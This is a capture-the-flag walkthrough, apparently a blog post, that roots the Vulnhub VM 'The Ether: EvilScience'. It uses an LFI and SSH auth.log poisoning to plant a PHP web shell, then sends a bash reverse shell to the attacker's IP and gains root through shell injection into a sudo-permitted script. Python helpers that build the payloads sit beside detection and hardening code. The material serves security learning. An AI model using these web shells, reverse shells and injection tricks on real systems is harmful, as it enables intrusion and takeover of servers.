Vulnhub Target: The Ether: EvilScience

Date: 2024-09-25 20:49:05

0x01 Project Address

The Ether: EvilScience (v1.0.1)

0x02 Target Description

The goal is to find out what The Ether is up to. You will be required to break into their server, root the machine, and retrieve the flag.

0x03 Environment Setup

Target machine

The Ether: EvilScience

NAT mode, 192.168.6.166

Attacker machine

Kali

NAT mode, 192.168.6.128

0x04 Detailed Steps

1. Host Discovery

nmap -sP 192.168.6.0/24   # -sP is the legacy alias for -sn (ping sweep, no port scan)

2. Port Scan

nmap -p- -A -sV -Pn 192.168.6.166

Ports 22 (SSH) and 80 (HTTP) are open.

3. Directory Scan

dirsearch -u 192.168.6.166

Two paths are found; they can be appended to the host and visited.

4. Web Access

Browsing to 192.168.6.166 shows a site with three pages: HOME, ABOUT US and RESEARCH.

Appending /about.php gives the ABOUT US page:

http://192.168.6.166/about.php

Appending /images gives a blank page with nothing on it.

5. Vulnerability Discovery

Looking at the ABOUT US and RESEARCH pages again for something exploitable: after clicking through, the URL passes the page to load in a file parameter (?file=...), which suggests a file inclusion vulnerability.

ABOUT US page

RESEARCH page

The Wappalyzer browser extension identifies the web server as Apache.

With Apache and a file inclusion, log poisoning is a standard route to a shell. We first try to include the SSH authentication log at its default path, /var/log/auth.log. Requested from the browser, the page simply redirects to the home page:

http://192.168.6.166/?file=/var/log/auth.log

Replaying the same request in Burp:

This time the log content comes back, so the file inclusion is confirmed.

The port scan also showed SSH on port 22. sshd writes every failed login attempt, including the username that was tried, to /var/log/auth.log, so we can inject PHP code into that log by supplying it as the SSH username:

ssh "<?php phpinfo();?>"@192.168.6.166

Connecting with the ssh client on Kali kept failing with "remote username contains invalid characters" (OpenSSH 9.6 and later refuse usernames containing shell metacharacters).

Running the same command from a cmd window on the host machine gave no such error.

Re-reading the log in Burp shows that the PHP code has been written into it, so next we inject a one-line web shell the same way.

6. Exploitation

First inject a one-liner that executes system commands:

ssh "<?php system($_GET[cmd]);?>"@192.168.6.166

Then run a command through it, ls here, by adding the cmd parameter to the inclusion request:

http://192.168.6.166/?file=/var/log/auth.log&cmd=ls

The command executes, so next we try a reverse shell.

Start a listener on Kali:

nc -lvvp 9999

The command has to be URL-encoded before it goes into the cmd parameter; otherwise the & and > in it are treated as query-string syntax and the request fails.

# reverse shell command
echo "bash -i >& /dev/tcp/192.168.6.128/9999 0>&1"|bash
# after URL encoding
echo%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.6.128%2F9999%200%3E%261%22%7Cbash

Kali receives the reverse shell.

Upgrade to a proper TTY:

python -c 'import pty;pty.spawn("/bin/bash");'
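An added example, not part of the original write-up, that assembles the requests from steps 5 and 6 and shows the defender's view of the same trick. The target and listener addresses and the file/cmd parameter names are the ones used above; the sshd log lines inside SAMPLE_AUTH_LOG are constructed to mimic the syslog format, not captured from the target.

```python
"""Added example, not from the original write-up: builds the log-poisoning
and LFI requests used in steps 5 and 6, and shows the defender's view of the
same trick. Assumptions: target 192.168.6.166, listener 192.168.6.128:9999
and the file/cmd parameter names are taken from the walkthrough; the sshd
lines in SAMPLE_AUTH_LOG are constructed, not captured from the target."""
import re
from typing import List, Tuple
from urllib.parse import quote

TARGET = "http://192.168.6.166"
LOG_PATH = "/var/log/auth.log"        # the file the vulnerable ?file= parameter includes
LISTENER = ("192.168.6.128", 9999)    # Kali side: nc -lvvp 9999

# sshd records a failed login's username verbatim in auth.log; once the LFI
# include()s that file, PHP evaluates whatever was in the username.
WEBSHELL_USERNAME = "<?php system($_GET[cmd]);?>"


def ssh_poison_command(payload: str, host: str) -> str:
    """The ssh invocation that plants PAYLOAD in auth.log as a failed username.
    OpenSSH 9.6+ clients refuse usernames with shell metacharacters, which is
    the 'remote username contains invalid characters' error seen on Kali."""
    return f'ssh "{payload}"@{host}'


def reverse_shell_cmd(host: str, port: int) -> str:
    """Bash reverse shell wrapped in echo|bash, as in the walkthrough."""
    return f'echo "bash -i >& /dev/tcp/{host}/{port} 0>&1"|bash'


def lfi_rce_url(cmd: str, base: str = TARGET, log_path: str = LOG_PATH) -> str:
    """include(auth.log) plus the command for the planted web shell.
    quote(..., safe="") percent-encodes every reserved character, so the
    '&' and '>' inside the shell command cannot be read as query-string syntax."""
    return f"{base}/?file={quote(log_path, safe='/')}&cmd={quote(cmd, safe='')}"


# ---- defender side ---------------------------------------------------------
SAMPLE_AUTH_LOG = """\
Sep 25 20:10:01 theEther sshd[1201]: Invalid user admin from 192.168.6.128 port 50122
Sep 25 20:11:14 theEther sshd[1215]: Invalid user <?php phpinfo();?> from 192.168.6.128 port 50130
Sep 25 20:12:40 theEther sshd[1230]: Invalid user <?php system($_GET[cmd]);?> from 192.168.6.128 port 50141
Sep 25 20:12:41 theEther sshd[1230]: Connection closed by 192.168.6.128 port 50141 [preauth]
"""

INVALID_USER = re.compile(r"sshd\[\d+\]: Invalid user (.*) from (\S+) port \d+")
PHP_OPEN_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def find_poisoned_usernames(log_text: str) -> List[Tuple[str, str]]:
    """(username, source_ip) for failed logins whose username carries a PHP
    open tag: a strong indicator someone is seeding the log for an LFI."""
    hits = []
    for line in log_text.splitlines():
        m = INVALID_USER.search(line)
        if m and PHP_OPEN_TAG.search(m.group(1)):
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    print(ssh_poison_command(WEBSHELL_USERNAME, "192.168.6.166"))
    print(lfi_rce_url(reverse_shell_cmd(*LISTENER)))
    for user, ip in find_poisoned_usernames(SAMPLE_AUTH_LOG):
        print(f"poisoned login from {ip}: {user!r}")
```

The encoded URL that lfi_rce_url produces is byte-for-byte the one in step 6; the detection half is the rule a SOC would run over auth.log, since a PHP open tag has no business in a username.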

7. Privilege Escalation

sudo -l shows a Python script that can be run as root without a password:

sudo -l

Running the script, it prompts for the full path of a log file. That input is evidently handed to a shell unchanged: entering /var/log/auth.log | <command> makes the script run <command> as root.

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

That is effectively root, so we use the script to look for the flag:

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | ls /root

ls /root shows flag.png; copy it into the web root so it can be fetched over HTTP:

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png
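The write-up does not reproduce xxxlogauditorxxx.py, so the following is an added example, not the target's script. It assumes the script feeds the entered log path to a shell in something like cat <path> | head, reproduces that pattern, and puts a hardened version next to it. The sample log is created in a temp directory so it runs without root.

```python
"""Added example, not the target's xxxlogauditorxxx.py (the write-up does not
show its source). It reproduces the pattern that lets '/var/log/auth.log | whoami'
run a command as root, next to a hardened version. Assumption: the real script
feeds the entered path to a shell in something like 'cat <path> | head'."""
import os
import subprocess
import tempfile


def audit_log_vulnerable(log_path: str) -> str:
    """User input spliced into a shell command line. With shell=True the '|' in
    '<path> | whoami' starts a second pipeline stage, and under a NOPASSWD
    sudo rule that stage runs as root."""
    cmd = "cat " + log_path + " | head -n 5"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def audit_log_safe(log_path: str, allowed_dir: str = "/var/log") -> str:
    """No shell: an argv list, so '|' is just a character in a filename.
    The path is also confined to the log directory and must be a regular file,
    so the root-privileged script cannot be turned into an arbitrary file reader."""
    real = os.path.realpath(log_path)
    root = os.path.realpath(allowed_dir)
    if os.path.commonpath([real, root]) != root:
        raise ValueError(f"log must live under {allowed_dir}")
    if not os.path.isfile(real):
        raise ValueError("log path is not a regular file")
    done = subprocess.run(["head", "-n", "5", real], capture_output=True, text=True, check=True)
    return done.stdout


def is_rejected(log_path: str, allowed_dir: str) -> bool:
    """True when the hardened version refuses the input."""
    try:
        audit_log_safe(log_path, allowed_dir)
    except ValueError:
        return True
    return False


def make_sample_log() -> str:
    """Constructed stand-in for auth.log in a temp dir, so this runs without root."""
    path = os.path.join(tempfile.mkdtemp(), "auth.log")
    with open(path, "w") as fh:
        fh.write("Sep 25 20:10:01 theEther sshd[1201]: Invalid user admin from 192.168.6.128 port 50122\n")
        fh.write("Sep 25 20:10:09 theEther sshd[1201]: Connection closed by 192.168.6.128 port 50122 [preauth]\n")
    return path


if __name__ == "__main__":
    log = make_sample_log()
    log_dir = os.path.dirname(log)
    print(audit_log_vulnerable(log + " | id"))        # prints the id output, not the log
    print(audit_log_safe(log, allowed_dir=log_dir))   # prints the log
    print(is_rejected(log + " | id", log_dir), is_rejected("/etc/passwd", log_dir))  # True True
```

Dropping shell=True is the fix for the injection itself; the directory confinement matters because a root-run "log viewer" that accepts any path is still a root file read (for example of /etc/shadow), and the NOPASSWD sudo rule that makes either flaw fatal should be revisited on its own.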

Then download it through the same endpoint (wget saves it under the literal name index.html?file=flag.png):

wget http://192.168.6.166/?file=flag.png

Opening the image shows nothing that looks like a flag.

Dumping the file with cat gives mostly binary garbage (strings would filter out just the readable parts):

cat 'index.html?file=flag.png'

Scrolling further down, the word flag appears, followed by a base64-encoded string; decoding it should give the flag:

flag: b2N0b2JlciAxLCAyMDE3LgpXZSBoYXZlIG9yIGZpcnN0IGJhdGNoIG9mIHZvbHVudGVlcnMgZm9yIHRoZSBnZW5vbWUgcHJvamVjdC4gVGhlIGdyb3VwIGxvb2tzIHByb21pc2luZywgd2UgaGF2ZSBoaWdoIGhvcGVzIGZvciB0aGlzIQoKT2N0b2JlciAzLCAyMDE3LgpUaGUgZmlyc3QgaHVtYW4gdGVzdCB3YXMgY29uZHVjdGVkLiBPdXIgc3VyZ2VvbnMgaGF2ZSBpbmplY3RlZCBhIGZlbWFsZSBzdWJqZWN0IHdpdGggdGhlIGZpcnN0IHN0cmFpbiBvZiBhIGJlbmlnbiB2aXJ1cy4gTm8gcmVhY3Rpb25zIGF0IHRoaXMgdGltZSBmcm9tIHRoaXMgcGF0aWVudC4KCk9jdG9iZXIgMywgMjAxNy4KU29tZXRoaW5nIGhhcyBnb25lIHdyb25nLiBBZnRlciBhIGZldyBob3VycyBvZiBpbmplY3Rpb24sIHRoZSBodW1hbiBzcGVjaW1lbiBhcHBlYXJzIHN5bXB0b21hdGljLCBleGhpYml0aW5nIGRlbWVudGlhLCBoYWxsdWNpbmF0aW9ucywgc3dlYXRpbmcsIGZvYW1pbmcgb2YgdGhlIG1vdXRoLCBhbmQgcmFwaWQgZ3Jvd3RoIG9mIGNhbmluZSB0ZWV0aCBhbmQgbmFpbHMuCgpPY3RvYmVyIDQsIDIwMTcuCk9ic2VydmluZyBvdGhlciBjYW5kaWRhdGVzIHJlYWN0IHRvIHRoZSBpbmplY3Rpb25zLiBUaGUgZXRoZXIgc2VlbXMgdG8gd29yayBmb3Igc29tZSBidXQgbm90IGZvciBvdGhlcnMuIEtlZXBpbmcgY2xvc2Ugb2JzZXJ2YXRpb24gb24gZmVtYWxlIHNwZWNpbWVuIG9uIE9jdG9iZXIgM3JkLgoKT2N0b2JlciA3LCAyMDE3LgpUaGUgZmlyc3QgZmxhdGxpbmUgb2YgdGhlIHNlcmllcyBvY2N1cnJlZC4gVGhlIGZlbWFsZSBzdWJqZWN0IHBhc3NlZC4gQWZ0ZXIgZGVjcmVhc2luZywgbXVzY2xlIGNvbnRyYWN0aW9ucyBhbmQgbGlmZS1saWtlIGJlaGF2aW9ycyBhcmUgc3RpbGwgdmlzaWJsZS4gVGhpcyBpcyBpbXBvc3NpYmxlISBTcGVjaW1lbiBoYXMgYmVlbiBtb3ZlZCB0byBhIGNvbnRhaW5tZW50IHF1YXJhbnRpbmUgZm9yIGZ1cnRoZXIgZXZhbHVhdGlvbi4KCk9jdG9iZXIgOCwgMjAxNy4KT3RoZXIgY2FuZGlkYXRlcyBhcmUgYmVnaW5uaW5nIHRvIGV4aGliaXQgc2ltaWxhciBzeW1wdG9tcyBhbmQgcGF0dGVybnMgYXMgZmVtYWxlIHNwZWNpbWVuLiBQbGFubmluZyB0byBtb3ZlIHRoZW0gdG8gcXVhcmFudGluZSBhcyB3ZWxsLgoKT2N0b2JlciAxMCwgMjAxNy4KSXNvbGF0ZWQgYW5kIGV4cG9zZWQgc3ViamVjdCBhcmUgZGVhZCwgY29sZCwgbW92aW5nLCBnbmFybGluZywgYW5kIGF0dHJhY3RlZCB0byBmbGVzaCBhbmQvb3IgYmxvb2QuIENhbm5pYmFsaXN0aWMtbGlrZSBiZWhhdmlvdXIgZGV0ZWN0ZWQuIEFuIGFudGlkb3RlL3ZhY2NpbmUgaGFzIGJlZW4gcHJvcG9zZWQuCgpPY3RvYmVyIDExLCAyMDE3LgpIdW5kcmVkcyBvZiBwZW9wbGUgaGF2ZSBiZWVuIGJ1cm5lZCBhbmQgYnVyaWVkIGR1ZSB0byB0aGUgc2lkZSBlZmZlY3RzIG9mIHRoZSBldGhlci4gVGhlIGJ1aWxkaW5nIHdpbGwgYmUgYnVybmVkIGFsb25nIHdpdGggdGhlIGV4cGVyaW1lbnRzIGNvbmR1Y3RlZCB0byBjb3ZlciB1cCB0aGUgc3RvcnkuCgpPY3RvYmVyIDEzLCAyMDE3LgpXZSBoYXZlIGRlY2lkZWQgdG8gc3RvcCBjb25kdWN0aW5nIHRoZXNlIGV4cGVyaW1lbnRzIGR1ZSB0byB0aGUgbGFjayBvZiBhbnRpZG90ZSBvciBldGhlci4gVGhlIG1haW4gcmVhc29uIGJlaW5nIHRoZSBudW1lcm91cyBkZWF0aCBkdWUgdG8gdGhlIHN1YmplY3RzIGRpc3BsYXlpbmcgZXh0cmVtZSByZWFjdGlvbnMgdGhlIHRoZSBlbmdpbmVlcmVkIHZpcnVzLiBObyBwdWJsaWMgYW5ub3VuY2VtZW50IGhhcyBiZWVuIGRlY2xhcmVkLiBUaGUgQ0RDIGhhcyBiZWVuIHN1c3BpY2lvdXMgb2Ygb3VyIHRlc3RpbmdzIGFuZCBhcmUgY29uc2lkZXJpbmcgbWFydGlhbCBsYXdzIGluIHRoZSBldmVudCBvZiBhbiBvdXRicmVhayB0byB0aGUgZ2VuZXJhbCBwb3B1bGF0aW9uLgoKLS1Eb2N1bWVudCBzY2hlZHVsZWQgdG8gYmUgc2hyZWRkZWQgb24gT2N0b2JlciAxNXRoIGFmdGVyIFBTQS4K

Base64-decode the flag content (the string shown above goes inside the quotes):

echo "<base64 string from above>" | base64 -d
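An added example, not from the original post, that does the cat-and-scroll step programmatically: it carves a base64 blob that follows a flag marker out of a binary file and shows where trailing data sits in a PNG. The PNG built inside it is constructed for the demo; the write-up does not say how the real flag.png was made.

```python
"""Added example, not from the original post: does the cat-and-scroll step
programmatically by carving a base64 blob that follows a 'flag' marker out of a
binary file, and shows where trailing data sits in a PNG. The PNG built below is
constructed for the demo; the write-up does not say how the real flag.png was made."""
import base64
import re

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# marker as seen in the dump, then a run of base64 alphabet long enough not to be noise
MARKER_RE = re.compile(rb"flag:?\s*([A-Za-z0-9+/]{16,}={0,2})")


def extract_flags(blob: bytes) -> list:
    """Every payload after the marker that decodes as valid base64 and UTF-8."""
    found = []
    for m in MARKER_RE.finditer(blob):
        try:
            found.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # bytes that merely looked like base64
    return found


def png_trailer(blob: bytes) -> bytes:
    """Bytes after the IEND chunk. Image viewers stop at IEND, which is why a
    payload appended there shows a normal picture but turns up in cat/strings.
    Empty if the blob is not a PNG or has no IEND."""
    if not blob.startswith(PNG_SIG):
        return b""
    idx = blob.find(b"IEND")
    if idx == -1:
        return b""
    return blob[idx + 4 + 4:]  # skip the 4-byte chunk type and 4-byte CRC


def build_sample_png(secret: str) -> bytes:
    """Constructed file: signature, 32 bytes standing in for image chunks,
    a genuine IEND chunk (length 0, CRC ae426082), then the marker and base64."""
    iend = b"\x00\x00\x00\x00IEND\xaeB`\x82"
    return PNG_SIG + b"\x00" * 32 + iend + b"\nflag: " + base64.b64encode(secret.encode()) + b"\n"


if __name__ == "__main__":
    sample = build_sample_png("October 1, 2017.\nWe have our first batch of volunteers.")
    print(png_trailer(sample))
    print(extract_flags(sample))
```

On a real capture you would read flag.png with open(path, "rb").read() and pass it to both functions; png_trailer tells you whether the text was simply appended after the image, and extract_flags does the decode that the echo | base64 -d step does by hand.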

The decoded flag:

october 1, 2017.
We have or first batch of volunteers for the genome project. The group looks promising, we have high hopes for this!

October 3, 2017.
The first human test was conducted. Our surgeons have injected a female subject with the first strain of a benign virus. No reactions at this time from this patient.

October 3, 2017.
Something has gone wrong. After a few hours of injection, the human specimen appears symptomatic, exhibiting dementia, hallucinations, sweating, foaming of the mouth, and rapid growth of canine teeth and nails.

October 4, 2017.
Observing other candidates react to the injections. The ether seems to work for some but not for others. Keeping close observation on female specimen on October 3rd.

October 7, 2017.
The first flatline of the series occurred. The female subject passed. After decreasing, muscle contractions and life-like behaviors are still visible. This is impossible! Specimen has been moved to a containment quarantine for further evaluation.

October 8, 2017.
Other candidates are beginning to exhibit similar symptoms and patterns as female specimen. Planning to move them to quarantine as well.

October 10, 2017.
Isolated and exposed subject are dead, cold, moving, gnarling, and attracted to flesh and/or blood. Cannibalistic-like behaviour detected. An antidote/vaccine has been proposed.

October 11, 2017.
Hundreds of people have been burned and buried due to the side effects of the ether. The building will be burned along with the experiments conducted to cover up the story.

October 13, 2017.
We have decided to stop conducting these experiments due to the lack of antidote or ether. The main reason being the numerous death due to the subjects displaying extreme reactions the the engineered virus. No public announcement has been declared. The CDC has been suspicious of our testings and are considering martial laws in the event of an outbreak to the general population.

--Document scheduled to be shredded on October 15th after PSA.

From: https://blog.csdn.net/weixin_57289348/article/details/142532947
